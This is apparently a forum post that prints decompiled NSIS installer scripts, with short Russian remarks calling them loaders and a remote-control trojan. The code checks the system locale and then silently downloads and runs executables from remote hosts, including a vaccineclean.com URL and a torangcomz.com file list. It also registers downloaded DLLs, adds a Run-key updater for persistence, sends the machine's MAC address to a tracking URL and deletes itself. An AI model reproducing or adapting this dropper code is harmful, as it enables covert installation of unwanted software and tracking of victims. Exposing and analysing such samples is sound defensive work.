Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 781 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "4" 0 830 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -84
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 824 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "5" 0 873 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -85
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 867 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "6" 0 916 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -86
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 910 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "7" 0 959 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -87
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 953 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "8" 0 1002 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -88
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 996 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "9" 0 1045 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -89
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 1039 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "1" 0 1088 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -90
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 1082 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Goto 1130
StrCmp "$0" "2" 0 1130 0
SendMessage $[62] 0x000C 100 0
ShowWindow 710 126
SendMessage $[62] 0x000C 100 -91
File $PLUGINSDIR\Description.txt
Push $0
Push $1
Push $2
Push $3
SetFlag 2 100
FileOpen 0 2147483648 3 4728
IfFlag 1125 0 2 0
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetFileSize(i r0, i 0) i .r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
IntOp $1 $1 + 1
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $1
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $2
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::ReadFile(i r0, i r2, i r1, *i .r3, i 0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
FileClose 0
SendMessage $[63] 0x00C5 262 100
SendMessage $[63] 0x000C 100 266
Call 1131
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $2
RegisterDLL $PLUGINSDIR\System.dll Free 0
SetFlag 2 100
Pop $3
Pop $2
Pop $1
Pop $0
Return
SetFlag 13 651
StrCmp "$PLUGINSDIR" "" 0 1141 0
Push $0
SetFlag 2 0
GetTempFileName $TEMP
Delete 8 $0
SetOutPath $0
IfFlag 1142 0 2 0
StrCpy $PLUGINSDIR "$0"
Pop $0
Return
MessageBox 2097168 4866 0 0 0
Quit
Return
[/more]/ Каждый из которых сам по себе загрузчик другого приложения - [more=vaccineclean]SetFlag 8 74
Call 64
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetSystemDefaultLangID() i .r0
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 64
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetLocaleInfoA(i 1024, i 0x4, t .r1, i 1024) i r0
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 64
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetLocaleInfoA(i 1024, i 0x8, t .r2, i 1024) i r0
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 64
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetLocaleInfoA(i 1024, i 0x2, t .r3, i 1024) i r0
RegisterDLL $PLUGINSDIR\System.dll Call 0
StrCmp "$1" "Çѱ¹¾î" 29 23 0
Abort
Call 64
File $PLUGINSDIR\SelfDelete.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\SelfDelete.dll SelfDelete 0
Quit
StrCpy $[35] "http://down.vaccineclean.com/app/partner_2010/vaccineclean_process_s_norun.exe"
StrCpy $[36] "vaccineclean_pandora.exe"
Call 64
File $PLUGINSDIR\StringFind.dll
SetFlag 13 0
Push /S
Push $CMDLINE
RegisterDLL $PLUGINSDIR\StringFind.dll StringCmp 0
Pop $0
StrCmp "$0" "true" 39 40 0
StrCpy $[37] "/S"
Call 64
File $PLUGINSDIR\StringFind.dll
SetFlag 13 0
Push /s
Push $CMDLINE
RegisterDLL $PLUGINSDIR\StringFind.dll StringCmp 0
Pop $0
StrCmp "$0" "true" 48 49 0
StrCpy $[37] "/S"
Return
Call 64
SetFlag 13 0
Call 64
File $PLUGINSDIR\FILEDownPlug.dll
SetFlag 13 0
Push $PLUGINSDIR\$[36]
Push $[35]
RegisterDLL $PLUGINSDIR\FILEDownPlug.dll DownLoad 0
Execute 552 0 0
Call 64
File $PLUGINSDIR\SelfDelete.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\SelfDelete.dll SelfDelete 0
Return
SetFlag 13 566
StrCmp "$PLUGINSDIR" "" 0 74 0
Push $0
SetFlag 2 0
GetTempFileName $TEMP
Delete 8 $0
SetOutPath $0
IfFlag 75 0 2 0
StrCpy $PLUGINSDIR "$0"
Pop $0
Return
MessageBox 2097168 576 0 0 0
Quit
Return
[/more], либо утилита троян удалённого управления - [more=Keyword]SendMessage $[32] 0x000C 4582 -38
SendMessage $[34] 0x000C 4582 -39
Return
FindWindow 44 4599 0 4606 0
GetDlgItem $[45] $[44] 1040
GetDlgItem $[46] $[44] 1006
GetDlgItem $[47] $[44] 1000
SendMessage $[45] 0x000C 4582 -40
Return
Return
SendMessage $[32] 0x000C 4582 -41
SendMessage $[34] 0x000C 4582 -42
Return
FindWindow 48 4599 0 4606 0
GetDlgItem $[49] $[48] 1006
GetDlgItem $[50] $[48] 1004
GetDlgItem $[51] $[48] 1027
GetDlgItem $[52] $[48] 1016
Return
IfFlag 24 0 3 -1
SendMessage $[32] 0x000C 4582 -43
SendMessage $[34] 0x000C 4582 -44
Goto 26
SendMessage $[32] 0x000C 4582 -45
SendMessage $[34] 0x000C 4582 -46
IfFlag 27 0 3 -1
Return
Call 709
SetFlag 13 0
File $PLUGINSDIR\modern-wizard.bmp
SetFlag 0 4674
Return
GetFunctionAddress 0 0
ShowWindow 4676 4582
ShowWindow 4680 4582
ShowWindow 4584 4582
ShowWindow 4595 4582
ShowWindow 4684 4582
ShowWindow 4688 4582
ShowWindow 4692 4674
GetFunctionAddress 1 0
Return
GetFunctionAddress 0 0
ShowWindow 4676 4674
ShowWindow 4680 4674
ShowWindow 4584 4674
ShowWindow 4595 4674
ShowWindow 4684 4674
ShowWindow 4688 4674
ShowWindow 4692 4582
GetFunctionAddress 1 0
Return
SendMessage $[41] 0x000C 4582 -48
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push 1044
RegisterDLL $PLUGINSDIR\nsDialogs.dll Create 0
Pop $[53]
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -49
RegisterDLL $PLUGINSDIR\nsDialogs.dll SetRTL 0
SerCtlColors 4737 0 0
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push
Push 193u
Push 109u
Push 0u
Push 0u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x0000000E|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[54]
Push $0
Push $1
Push $2
Push $R0
StrCpy $R0 "$[54]"
StrCpy $1 ""
StrCpy $2 ""
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *(i, i, i, i) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
IntCmp $0 0 110 0 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push user32::GetClientRect(iR0, ir0)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *$0(i, i, i .s, i .s)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $0
RegisterDLL $PLUGINSDIR\System.dll Free 0
Pop $1
Pop $2
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $PLUGINSDIR\modern-wizard.bmp
Push user32::LoadImage(i0, ts, i 0, ir1, ir2, i0x0010) i.s
RegisterDLL $PLUGINSDIR\System.dll Call 0
Pop $0
SendMessage $R0 0x0172 4582 4830
Pop $R0
Pop $2
Pop $1
Push $0
Exch
Pop $0
Pop $[55]
IfFlag 0 191 4 -1
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -50
Push 28u
Push 195u
Push 10u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[56]
SerCtlColors 5082 0 0
CreateFont 57 -51 5086 5089 0
SendMessage $[56] 0x0030 5093 4582
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -52
Push 40u
Push 195u
Push 45u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[58]
SerCtlColors 5112 0 0
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -53
Push 10u
Push 195u
Push 90u
Push 120u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x00010000|0x00000000|0x00000C00|0x00000009|0x00002000
Push BUTTON
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[60]
SerCtlColors 5215 0 0
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -54
Push 10u
Push 195u
Push 115u
Push 120u
Push 0
Push 0x40000000|0x10000000|0x04000000|0x00010000|0x00000000|0x00000C00|0x00000009|0x00002000
Push BUTTON
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[61]
SerCtlColors 5224 0 0
SendMessage $[60] 0x00F1 4674 4582
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push user32::SetFocus(i$[60])
RegisterDLL $PLUGINSDIR\System.dll Call 0
Goto 221
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -50
Push 28u
Push 195u
Push 10u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[56]
SerCtlColors 5082 0 0
CreateFont 57 -51 5086 5089 0
SendMessage $[56] 0x0030 5093 4582
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
Push -55
Push 130u
Push 195u
Push 45u
Push 120u
Push 0x00000020
Push 0x40000000|0x10000000|0x04000000|0x00000100
Push STATIC
RegisterDLL $PLUGINSDIR\nsDialogs.dll CreateControl 0
Pop $[58]
SerCtlColors 5112 0 0
Call 33
Call 709
File $PLUGINSDIR\nsDialogs.dll
SetFlag 13 0
RegisterDLL $PLUGINSDIR\nsDialogs.dll Show 0
Call 43
IntCmp $[55] 0 234 0 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $[55]
Push gdi32::DeleteObject(is)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Return
IfFlag 0 242 4 -1
SendMessage $[60] 0x00F0 4582 4582 $[5215]
IntCmp $[59] 1 0 241 241
Reboot
Quit
Goto 242
Return
Return
GetDlgItem $[32] $HWNDPARENT 1037
CreateFont 33 -51 -56 5089 0
SendMessage $[32] 0x0030 5312 4582
GetDlgItem $[34] $HWNDPARENT 1038
SerCtlColors 4584 0 0
SerCtlColors 4595 0 0
GetDlgItem $[35] $HWNDPARENT 1034
SerCtlColors 5326 0 0
GetDlgItem $[36] $HWNDPARENT 1039
SerCtlColors 4684 0 0
GetDlgItem $[38] $HWNDPARENT 1028
SerCtlColors 4676 24 0
GetDlgItem $[37] $HWNDPARENT 1256
SerCtlColors 4680 24 0
SendMessage $[37] 0x000C 4582 5345
GetDlgItem $[39] $HWNDPARENT 1035
GetDlgItem $[40] $HWNDPARENT 1045
GetDlgItem $[41] $HWNDPARENT 1
GetDlgItem $[42] $HWNDPARENT 2
GetDlgItem $[43] $HWNDPARENT 3
Call 28
Return
Return
Call 709
SetFlag 13 0
Call 709
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $PLUGINSDIR\instinfo.ini
Push http://torangcomz.com/instinfo.php
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
ReadINIStr 66 5480 5489 5419
Push $CMDLINE
Call 278
Goto 308
Push $0
Exch
Pop $0
Push $1
Push $2
Push $3
StrCpy $1 "0"
StrCpy $3 ""
IntOp $1 $1 - 1
StrCpy $2 "$0" 1 $1
StrCmp "$2" "" 296 0 0
StrCmp "$2" "\" 296 0 0
StrCmp "$3" "noext" 286 0 0
StrCmp "$2" "." 0 286 0
StrCpy $0 "$0" $1
StrCpy $3 "noext"
StrCpy $1 "0"
Goto 286
StrCmp "$1" "-1" 300 0 0
IntOp $1 $1 + 1
StrCpy $0 "$0" "" $1
Goto 301
StrCpy $0 ""
Pop $3
Pop $2
Pop $1
Push $0
Exch
Pop $0
Return
Pop $1
StrCpy $[67] "kmadmin"
Return
SetOutPath $INSTDIR
StrCpy $R0 "1"
Goto 315
IntOp $R0 $R0 + 1
IntCmp $R0 $[66] 0 0 419
ReadINIStr 1 5548 5556 5419
ReadINIStr 2 5548 5564 5419
ReadINIStr 3 5548 5573 5419
ReadINIStr 4 5548 5582 5419
StrCmp "$3" "INSTDIR" 0 329 0
Call 709
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $INSTDIR\$2
Push $1
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
StrCpy $5 "$INSTDIR\$2"
Goto 345
StrCmp "$3" "SYSDIR" 0 338 0
Call 709
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $SYSDIR\$2
Push $1
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
StrCpy $5 "$SYSDIR\$2"
Goto 345
Call 709
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $PLUGINSDIR\$2
Push $1
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
StrCpy $5 "$PLUGINSDIR\$2"
Sleep 4805
Push $2
Call 349
Goto 371
Push $0
Exch
Pop $0
Push $1
Push $2
StrCpy $1 "0"
IntOp $1 $1 - 1
StrCpy $2 "$0" 1 $1
StrCmp "$2" "" 364 0 0
StrCmp "$2" "\" 364 0 0
StrCmp "$2" "." 0 355 0
StrCmp "$1" "-1" 364 0 0
IntOp $1 $1 + 1
StrCpy $0 "$0" "" $1
Goto 365
StrCpy $0 ""
Pop $2
Pop $1
Push $0
Exch
Pop $0
Return
Pop $6
StrCmp "$6" "exe" 0 375 0
Execute 5637 0 0
Goto 416
StrCmp "$6" "dll" 0 416 0
RegisterDLL $5 DllRegisterServer 4294967239
Sleep 5667
RegisterDLL $5 DllRegisterServer 4294967239
StrCmp "$3" "INSTDIR" 0 416 0
Push $5
Call 383
Goto 415
Push $0
Exch
Pop $0
Push $1
Push $2
Push $3
Push $4
Push $5
Push $6
SetFlag 2 4582
GetDLLVersion 1 2 4830
IfFlag 403 0 2 0
IntOp $3 $1 12 16
IntOp $3 $3 & 0x0000FFFF
IntOp $4 $1 & 0x0000FFFF
IntOp $5 $2 12 16
IntOp $5 $5 & 0x0000FFFF
IntOp $6 $2 & 0x0000FFFF
StrCpy $0 "$3.$4.$5.$6"
Goto 405
SetFlag 2 4674
StrCpy $0 ""
Pop $6
Pop $5
Pop $4
Pop $3
Pop $2
Pop $1
Push $0
Exch
Pop $0
Return
Pop $R1
Goto 314
Goto 314
Goto 419
WriteUninstaller $INSTDIR\uninstall.exe 56778 13956
WriteRegStr HKCU "SOFTWARE\Keyword Search" "PID" "$[67]"
Push
Push L
Call 425
Goto 594
Push $1
Exch
Pop $1
Exch
Push $0
Exch
Pop $0
Exch
Push $2
Push $3
Push $4
Push $5
Push $6
Push $7
SetFlag 2 4582
StrCmp "$1" "L" 465 0 0
StrCmp "$1" "A" 449 0 0
StrCmp "$1" "C" 449 0 0
StrCmp "$1" "M" 449 0 0
StrCmp "$1" "LS" 465 0 0
StrCmp "$1" "AS" 449 0 0
StrCmp "$1" "CS" 449 0 0
StrCmp "$1" "MS" 449 0 0
Goto 557
IfFileExists $0 0 557
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *(i,l,l,l,i,i,i,i,&t260,&t14) i .r6
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::FindFirstFileA(t,i)i(r0,r6) .r2
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::FindClose(i)i(r2)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *(&i2,&i2,&i2,&i2,&i2,&i2,&i2,&i2) i .r7
RegisterDLL $PLUGINSDIR\System.dll Call 0
StrCmp "$1" "L" 0 477 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetLocalTime(i)i(r7)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Goto 518
StrCmp "$1" "LS" 0 484 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::GetSystemTime(i)i(r7)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Goto 518
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *$6(i,l,l,l,i,i,i,i,&t260,&t14)i(,.r4,.r3,.r2)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $6
RegisterDLL $PLUGINSDIR\System.dll Free 0
StrCmp "$1" "A" 0 497 0
StrCpy $2 "$3"
Goto 508
StrCmp "$1" "C" 0 500 0
StrCpy $2 "$4"
Goto 508
StrCmp "$1" "M" 508 0 0
StrCmp "$1" "AS" 513 0 0
StrCmp "$1" "CS" 0 505 0
StrCpy $3 "$4"
Goto 513
StrCmp "$1" "MS" 0 508 0
StrCpy $3 "$2"
Goto 513
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::FileTimeToLocalFileTime(*l,*l)i(r2,.r3)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push kernel32::FileTimeToSystemTime(*l,i)i(r3,r7)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push *$7(&i2,&i2,&i2,&i2,&i2,&i2,&i2,&i2)i(.r5,.r6,.r4,.r0,.r3,.r2,.r1,)
RegisterDLL $PLUGINSDIR\System.dll Call 0
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push $7
RegisterDLL $PLUGINSDIR\System.dll Free 0
IntCmp $0 9 0 0 530
StrCpy $0 "0$0"
IntCmp $1 9 0 0 532
StrCpy $1 "0$1"
IntCmp $2 9 0 0 534
StrCpy $2 "0$2"
IntCmp $6 9 0 0 536
StrCpy $6 "0$6"
StrCmp "$4" "0" 0 539 0
StrCpy $4 "Sunday"
Goto 565
StrCmp "$4" "1" 0 542 0
StrCpy $4 "Monday"
Goto 565
StrCmp "$4" "2" 0 545 0
StrCpy $4 "Tuesday"
Goto 565
StrCmp "$4" "3" 0 548 0
StrCpy $4 "Wednesday"
Goto 565
StrCmp "$4" "4" 0 551 0
StrCpy $4 "Thursday"
Goto 565
StrCmp "$4" "5" 0 554 0
StrCpy $4 "Friday"
Goto 565
StrCmp "$4" "6" 0 557 0
StrCpy $4 "Saturday"
Goto 565
SetFlag 2 4674
StrCpy $0 ""
StrCpy $1 ""
StrCpy $2 ""
StrCpy $3 ""
StrCpy $4 ""
StrCpy $5 ""
StrCpy $6 ""
Pop $7
Push $6
Exch
Pop $6
Exch
Push $5
Exch
Pop $5
Exch
Push $4
Exch
Pop $4
Exch
Push $3
Exch
Pop $3
Exch
Push $2
Exch
Pop $2
Exch
Push $1
Exch
Pop $1
Exch
Push $0
Exch
Pop $0
Return
Pop $0
Pop $1
Pop $2
Pop $3
Pop $4
Pop $5
Pop $6
WriteRegStr HKCU "SOFTWARE\Keyword Search" "instdate" "$2$1$0$4"
WriteRegStr HKCU "SOFTWARE\Microsoft\Windows\CurrentVersion\Run" "KeywordSearchUpdater" "$INSTDIR\KeywordSearchUpdater.exe"
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NS_LANG_CODE" "DisplayName" "-3"
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NS_LANG_CODE" "DisplayIcon" "$INSTDIR\uninstall.exe"
WriteRegStr HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NS_LANG_CODE" "UninstallString" "$INSTDIR\uninstall.exe"
WriteRegDWORD HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NS_LANG_CODE" "NoModify" "1"
WriteRegDWORD HKLM "SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NS_LANG_CODE" "NoRepair" "1"
Call 618
Call 709
File $PLUGINSDIR\NSISdl.dll
SetFlag 13 0
Push $PLUGINSDIR\install.chk
Push http://torangcomz.com/app_install.php?mac=$R0&ver=$R1&pid=$[67]
RegisterDLL $PLUGINSDIR\NSISdl.dll download 0
DelReg 0 2147483649 6598 0
DelReg 0 2147483649 6731 0
Return
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push 4096
RegisterDLL $PLUGINSDIR\System.dll Alloc 0
Pop $3
Call 709
File $PLUGINSDIR\System.dll
SetFlag 13 0
Push iphlpapi::GetAdaptersInfo(i r3r4, *l 4096 r2)i.r1
RegisterDLL $PLUGINSDIR\System.dll Call 0
StrCmp "$1" "0" 0 647 0
StrCmp "$4" "0" 647 0 0
Call 709
File $PLUGINSDIR\System.dll
